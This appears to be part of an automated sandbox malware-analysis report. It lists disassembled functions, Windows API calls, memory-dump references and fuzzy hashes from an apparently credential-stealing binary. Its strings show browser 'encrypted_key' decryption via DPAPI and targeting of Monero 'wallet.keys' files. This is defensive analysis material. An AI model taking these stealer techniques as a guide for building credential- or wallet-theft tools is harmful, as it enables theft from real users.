                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 6f3b61d29f064825f5a98c230e2936829e696c9ddc1c97b7569235727b0cdb52
                                  • Instruction ID: 1385eecacce8d969d106d54edd5303a59f40d8183ef19efe3e5a53bc950c6911
                                  • Opcode Fuzzy Hash: 6f3b61d29f064825f5a98c230e2936829e696c9ddc1c97b7569235727b0cdb52
                                  • Instruction Fuzzy Hash: 5C3163B6D00208ABCF04EBE4DC55EEEB7F8AF59300F044598E911B3241E7309A04CBB6
                                  Function 00BB8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BC05BF), ref: 00BB885A
                                  • Process32First.KERNEL32(?,00000128), ref: 00BB886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00BB8883
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • CloseHandle.KERNEL32(?), ref: 00BB88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 4362ea7b944ca9c2e018c0853e604eb86708499b0bf937650bcf018a90dcff37
                                  • Instruction ID: c5b0bb86fdf387f17dcf90fcc19fc30dec4ff1570182a308a778e907d4e4ba35
                                  • Opcode Fuzzy Hash: 4362ea7b944ca9c2e018c0853e604eb86708499b0bf937650bcf018a90dcff37
                                  • Instruction Fuzzy Hash: 0F314D71911218ABCB24EF95DD91FFEB7B8EB44700F5041D9F10EA21A0EBB06A44CFA1
                                  Function 00C1FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C1FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: b12a343c1edbf1ed33e4420eb2f8e92b87a6994cbcfc970720b724f125b01426
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 6501D432209731EEFA3426B56CC99A73694EF127B5738433DF526805F2EF924C82B180
                                  Function 00BB7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0DE8,00000000,?), ref: 00BB7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00BC0DE8,00000000,?), ref: 00BB7B54
                                  • wsprintfA.USER32 ref: 00BB7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 6c5ac42f0bc3b30ffff384a82d68a2d3d1724a16830d3be77a0d728172652264
                                  • Instruction ID: 5c265be6398c695675fae594f60d546e580a232873ffffb98b2d2b80769c2f92
                                  • Opcode Fuzzy Hash: 6c5ac42f0bc3b30ffff384a82d68a2d3d1724a16830d3be77a0d728172652264
                                  • Instruction Fuzzy Hash: 87115AB2908218ABCB14DBCADD44BBEB7F8FB4CB11F00415AF655A2290E7795940C7B0
                                  Function 00BB9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00BB3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00BB3D3E,?), ref: 00BB948C
                                  • GetFileSizeEx.KERNEL32(000000FF,00BB3D3E), ref: 00BB94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BB94B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 2211c140ea6e2a0ddb9593802d9f7d41411594e223ca88f90b4fc29cb2b95eb5
                                  • Instruction ID: 4726ab5d6dd72d04f48270a9ce7e19499981f54df51c417809645a654599a15d
                                  • Opcode Fuzzy Hash: 2211c140ea6e2a0ddb9593802d9f7d41411594e223ca88f90b4fc29cb2b95eb5
                                  • Instruction Fuzzy Hash: B3F04435E04208BFDB20DFB1DC49F9E77B9AB48710F10C594FA55A7280D6B09A458B40
                                  Function 00BBCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00BBCA7E
                                    • Part of subcall function 00BBC2A0: __amsg_exit.LIBCMT ref: 00BBC2B0
                                  • __getptd.LIBCMT ref: 00BBCA95
                                  • __amsg_exit.LIBCMT ref: 00BBCAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00BBCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: b51ba7679abff4a8f1fc36b8395ea34e2e422274912686973a4d4607485878e5
                                  • Instruction ID: 88f18beb7e7df4dd12eb59a24c569ed92c4abd483bd654dd361c3f3a60a551a8
                                  • Opcode Fuzzy Hash: b51ba7679abff4a8f1fc36b8395ea34e2e422274912686973a4d4607485878e5
                                  • Instruction Fuzzy Hash: C0F090329446189BD624FBA89803FFE3FE0AF44720F1001C9F409A72D6CFE45D40CA96
                                  Function 00C204D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: 39f09d7f22e026cf320f0139dd483a08d425797fd35cd22c6cfc009c228fdfb8
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: AA416A71900219AFDF15DF98EC81AEEBBB5FF48304F2880AAF91467212D3359A90DF54
                                  Function 00BB5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB51CA
                                  • lstrcat.KERNEL32(?,00BC1058), ref: 00BB51E7
                                  • lstrcat.KERNEL32(?,01309688), ref: 00BB51FB
                                  • lstrcat.KERNEL32(?,00BC105C), ref: 00BB520D
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4B7C
                                    • Part of subcall function 00BB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                    • Part of subcall function 00BB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                    • Part of subcall function 00BB4B60: FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: daa440bfcaf4886cf5a86f04a6af4574e1b7bb2669ab9164bb40b844a15dbfae
                                  • Instruction ID: b03475c477ebd4204e5cf2cc5cb083c3600ae7364bb784ab8914d14e93cfc013
                                  • Opcode Fuzzy Hash: daa440bfcaf4886cf5a86f04a6af4574e1b7bb2669ab9164bb40b844a15dbfae
                                  • Instruction Fuzzy Hash: 1C21A0B6904108ABCB54FF70EC46FFD737C9755300F0045D8B69966191DEB596CC8B91